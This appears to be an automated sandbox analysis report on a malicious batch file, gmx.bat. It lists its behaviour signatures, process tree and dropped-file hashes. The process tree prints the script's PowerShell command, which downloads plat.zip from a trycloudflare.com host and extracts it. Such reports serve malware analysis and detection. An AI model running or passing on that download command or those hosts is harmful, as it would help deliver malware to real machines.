Analysis
-
max time kernel
150s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
12/08/2024, 12:21
General
-
Target
https://giants-twisted-article-promise.trycloudflare.com/gmx.bat
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Powershell Invoke Web Request.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 34 IoCs
-
NTFS ADS 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 33 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://giants-twisted-article-promise.trycloudflare.com/gmx.bat1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdef0446f8,0x7ffdef044708,0x7ffdef0447182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,5611818320887773510,8856679393832569320,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,5611818320887773510,8856679393832569320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,5611818320887773510,8856679393832569320,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5611818320887773510,8856679393832569320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5611818320887773510,8856679393832569320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,5611818320887773510,8856679393832569320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,5611818320887773510,8856679393832569320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5611818320887773510,8856679393832569320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5611818320887773510,8856679393832569320,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5611818320887773510,8856679393832569320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5611818320887773510,8856679393832569320,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2092,5611818320887773510,8856679393832569320,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5360 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2092,5611818320887773510,8856679393832569320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5611818320887773510,8856679393832569320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,5611818320887773510,8856679393832569320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5976 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,5611818320887773510,8856679393832569320,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4808 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\gmx.bat" "1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://luck-transaction-en-function.trycloudflare.com/plat.zip' -OutFile 'C:\Users\Admin\Downloads\plat.zip' }"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\plat.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
152B
MD5ecf7ca53c80b5245e35839009d12f866
SHA1a7af77cf31d410708ebd35a232a80bddfb0615bb
SHA256882a513b71b26210ff251769b82b2c5d59a932f96d9ce606ca2fab6530a13687
SHA512706722bd22ce27d854036b1b16e6a3cdb36284b66edc76238a79c2e11cee7d1307b121c898ad832eb1af73e4f08d991d64dc0bff529896ffb4ebe9b3dc381696
-
Filesize
152B
MD54dd2754d1bea40445984d65abee82b21
SHA14b6a5658bae9a784a370a115fbb4a12e92bd3390
SHA256183b8e82a0deaa83d04736553671cedb738adc909f483b3c5f822a0e6be7477d
SHA51292d44ee372ad33f892b921efa6cabc78e91025e89f05a22830763217826fa98d51d55711f85c8970ac58abf9adc6c85cc40878032cd6d2589ab226cd099f99e1
-
Filesize
72B
MD5dda999d8a7b2bceb9dc1a4372b48bbb4
SHA1e11736e595d5b084687e984247b60a285312477e
SHA25639921f1ff42d5f988f18dc88b4cf60ab4595a59f88ad22c1dafafc2756263e21
SHA51256227466ed69d962f3a7ac6a0a1ae5d50c8d230e2e8b8ffd853685d27c865f2f37c86d11848f61e9ce5eb68e659f8260a774bf29f041829d2d1ee43210028093
-
Filesize
216B
MD51fe42f7a2ef20b321aaa37e2414ebf20
SHA1b4acf53ae9631d6122a0b6abc7915fe5ab7b21e3
SHA256b27870733d016cf4270cac5c2217629c6e24da3aa07bcffdbfe849d7a57b2b9a
SHA5124c04f7e72fb5f8ea4ef77936512ab5f94cacc5d40b77a421499591fa3fa745eabe38a4ed2608c483e3c06a55fb53fb2651eab3d69aee8799b1dd3eaccc8dace2
-
Filesize
6KB
MD58e7ec02e72b92041071755bff6586145
SHA134c274126175fe40103dad4212b10cb98a6a4a66
SHA256aff92995a0222f7fab6d7f912c6aeee8952c5d48fe9e67f4f8053585e9d47732
SHA5129562c52fce0af3d95420a5d8aa805c9391e7bf73e4841f690bc446d849fd8b0fa7c23201fda47a81a8d7fba53be0599e4cb5c44ecc7c6a4d3a3df4f2b38a5a5b
-
Filesize
6KB
MD53d0b55f0c996ee0bf75c6d4dad9ae324
SHA19ec26446e0e1265728f28d2b0abde8308a5829c3
SHA256a0aa84c3af9824afecbf4ed95ee64b5b22181b907633ccae7fc3c7a6c85b13e8
SHA512ce1f0cfc1b74df57e170628eac0dda90253c8a978b240b09b3c949d1b65b8b25de00bb088f224b9c065b76d793913eb88770b2d725292911f2cf7863a6aaacc9
-
Filesize
6KB
MD5927174e57c939b7145e7aded3800f3da
SHA178c2e2e6bf9e4d588806ed4fc75927b9f5561757
SHA25634b6d4e66a4e1bd174f2c3390e4fad130e53ea6258822d801aa873e39bfe2159
SHA51280a113b66d7cf9bdddd862ae92d21b6aa55df1f4de154b10fb22581f69fec83679cc4ecb4ea097bff49a6168c239d211a27c7410686f9340e5e66053dfbb1567
-
Filesize
7KB
MD57b55be32a3f75c0b84e29aaa7c81b9b3
SHA1395a5f8ae6ba49609ab4cd55af71def932591863
SHA256833b6040ad87b0e7f7223ca518b0276d94f9f67abb5e58d9aa51069ba521c8a1
SHA5123b942321687aca6748c43394d264b9a4249fdbe37a891bdcc6ab63f8ad27e6d110bfc29089d519d0b98a8b0440e727091ecc90f490247e0177eed25f2858e354
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5bd8e95303e5e3e95eb1702579a1e6ca6
SHA136c1961efa5f0ed7625c39a8d5547e97e663c1f6
SHA256c3f8916e77e49635f4763fa116297c130333df81a5ba06b216cfe6612fd5e1b4
SHA5120beb445b70bf804d7434b296e4c200d26d3bc27131986fe50f5eca1c8e3f057a556c735897f057993cb095fdadd34f9f424cb5db4ee107fd17088637bf4c3c1d
-
Filesize
11KB
MD54270d7edcd0341d7f477bd6f3c0fa505
SHA19dcfae8d4f2ffdba5d2f628f0020c4075a7c9db0
SHA2569848be17de05aa7feed6cda9d1ccb8b2a7c0e64277a96ca1f68654c0a4ff2198
SHA5123e34232e090a0fe8bf96a66910c5e2dc3b44dd5f62bfbc07470820438435e53b6f24c808db93f6e0a28f3c3dcb997217bd6a04501324009090542f05d79db288
-
Filesize
1KB
MD508f9f3eb63ff567d1ee2a25e9bbf18f0
SHA16bf06056d1bb14c183490caf950e29ac9d73643a
SHA25682147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
SHA512425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
21KB
MD5f70fd124654b4fd7925ab6bae088c3a9
SHA17ba9fc56a966cefc6d0552ac15104a44acec15a5
SHA2562ef6a1f22613b8b82657b62b6ac82380fb31eb76f8ace82736b1662703c55f4a
SHA512d424fb67d3cf3a336bc6b92f5bf99d7c95c1e39c54903e47b29885515b92caf91928097ab8d5e7c216f10280ab7fbed8062edfdb4713c59efe190134d3f2bcd2
-
Filesize
43.6MB
MD546799f5539d87fb7f8903391597ead44
SHA1e1e5c20b3d2a6b4a9b38b17491c3360ea9f40350
SHA2560b71db25197256055d8badef607c2a9f189cd265d9d907e217001d3530a41efe
SHA51252bec783f89fa27c63efb3f1b292b1e70d93cacd2d6844701804a7d9c6e8fa7e30e3ee50ad19b7430b43eb1c071b971994997399819c493d1c56b3f97b7176f9
-
Filesize
136KB
-
Filesize
72KB
-
Filesize
40KB